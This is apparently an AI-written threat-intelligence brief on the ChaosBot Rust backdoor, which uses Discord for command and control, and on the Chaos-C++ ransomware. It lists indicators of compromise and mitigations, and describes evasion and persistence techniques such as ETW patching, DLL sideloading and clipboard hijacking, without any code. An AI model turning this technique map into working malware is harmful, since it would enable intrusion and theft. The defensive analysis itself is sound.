ChaosBot: a new Rust backdoor that uses Discord to control infected PCs

Disclosed: October 13, 2025Category: Malware / Threat Intelligence

A fresh, worrying entrant in the threat landscape — ChaosBot — was first observed in late September 2025 in a financial-services environment and publicly disclosed on October 13, 2025. Written in Rust, this backdoor stands out because it uses Discord channels as its command-and-control (C2) and combines reconnaissance, remote command execution, modern persistence, and evasion techniques. A related family, Chaos‑C++, has evolved into destructive ransomware that also hijacks clipboards to steal cryptocurrency.

TL;DR — Quick summary

  • Malware: ChaosBot (Rust backdoor); Chaos‑C++ (C++ ransomware with destructive & clipboard-hijack features).
  • C2 channel: Discord channels (operator accounts observed: chaos_00019, lovebb0024 — may change).
  • Distribution: Compromised credentials (Cisco VPN, over-privileged AD service account) and phishing LNK shortcuts that launch PowerShell to fetch payloads.
  • Persistence: DLL sideloading (msedge_elf.dll) via trojanized Edge binary (identity_helper.exe); also deploys FRP reverse proxy and attempts VS Code Tunnel backdoor.
  • Evasion: ETW patching (ntdll!EtwEventWrite) and VM detection via MAC prefix checks.
  • Ransomware: Chaos‑C++ deletes files >1.3 GB, encrypts smaller files, and hijacks clipboard crypto addresses.

Technical breakdown — what ChaosBot does

ChaosBot is primarily a remote-control backdoor. Once executed it:

  • Performs system reconnaissance (enumeration, environment checks).
  • Connects to a Discord channel created by the operator (often named after the victim hostname) and polls for commands — replacing bespoke C2 infra with a resilient public platform.
  • Supports interactive commands: shell (execute commands), scr (screenshots), download/upload, and file exfiltration via Discord posts.
  • Deploys tooling such as an FRP reverse proxy to open persistent tunnels into the breached environment.
  • Attempts to install alternate backdoors (observed attempts to use VS Code Tunnel).
  • Achieves persistence through DLL sideloading: identity_helper.exe (trojanized Edge binary) loads msedge_elf.dll.

How it spreads

Two main vectors were observed in the disclosure:

  • Compromised credentials + lateral execution: Stolen Cisco VPN credentials and over-privileged Active Directory service accounts were used to run remote WMI commands and push ChaosBot across hosts.
  • Phishing with malicious LNK files: Targets receive an LNK file; opening it runs a PowerShell one-liner that downloads the payload and shows a decoy PDF (e.g., spoofed bank doc) to distract the victim.

Evasion techniques

  • ETW patching: ChaosBot patches the start of ntdll!EtwEventWrite to hinder Event Tracing for Windows (ETW) detections.
  • VM detection: The malware checks MAC prefixes for VMware/VirtualBox vendors and exits if it detects a sandbox/VM to avoid analysis.

Chaos‑C++ ransomware: destructive + clipboard theft

A related family — Chaos‑C++ — exhibits destructive and financial-theft features:

  • Deletes files larger than ~1.3 GB (irrecoverable) while encrypting smaller files.
  • Hijacks the clipboard: when it detects cryptocurrency addresses, it replaces them with attacker-controlled addresses to intercept transfers.
  • Installer masquerades as bogus utilities (e.g., “System Optimizer v2.1”).
  • Looks for %APPDATA%\READ_IT.txt — presence may change behavior (monitoring mode); when absent and running as admin, it disables recovery features.

Indicators of Compromise (IOCs) & telltale signs

Hunt for these artifacts and behaviors:

  • Files/processes: identity_helper.exe, msedge_elf.dll, %APPDATA%\READ_IT.txt.
  • Distribution artifacts: malicious .lnk files, decoy PDFs, PowerShell one-liners that fetch executables.
  • Network: Unusual Discord API calls or channel activity tied to hostnames; FRP or unexpected reverse-proxy tunnels; anomalous VS Code Tunnel connections.
  • Accounts/behavior: Suspicious AD service account activity, WMI remote executions, Cisco VPN logins from unfamiliar IPs.
  • Discord identifiers: Operator accounts observed (examples): chaos_00019, lovebb0024 — these may rotate.

Immediate mitigation & detection recommendations

  • Harden credentials & access: Revoke/rotate compromised credentials, enforce MFA for VPN and privileged accounts, and remove over-privileged service accounts.
  • Block LNK-based phishing: Configure email gateways to block suspicious .lnk attachments; detect and quarantine PowerShell download events.
  • Monitor DLL sideloading: Alert on non-standard DLLs loaded by browser or legitimate binaries (e.g., Edge variants loading msedge_elf.dll).
  • Network monitoring: Detect Discord API access from endpoints that shouldn’t use Discord; flag unknown outbound FRP tunnels or reverse proxies.
  • Detect ETW tampering & VM checks: Monitor for modifications to ntdll!EtwEventWrite and unusual process exits in virtualized environments.
  • Protect crypto flows: Educate users and implement clipboard protections or endpoint controls to detect suspicious clipboard swaps.
  • Backup & recovery: Maintain immutable offline backups and IR playbooks for extortion/destruction scenarios.

Conclusion

ChaosBot shows how modern adversaries compose multiple tools and public platforms (Discord, FRP, VS Code Tunnel) to build resilient, stealthy C2 channels. Paired with the evolution of Chaos‑C++ into destructive and financially-motivated ransomware, the threat demonstrates credential abuse, DLL sideloading persistence, reverse-proxying, and sophisticated anti-analysis techniques.

If you manage endpoints or networks: assume attackers are innovating and proactively hunt for the artifacts above. I can convert this into a concise incident-response checklist, a slide deck for SOC briefings, or a SOC playbook (IR steps + detection rules) — tell me which format you want and I’ll produce it next.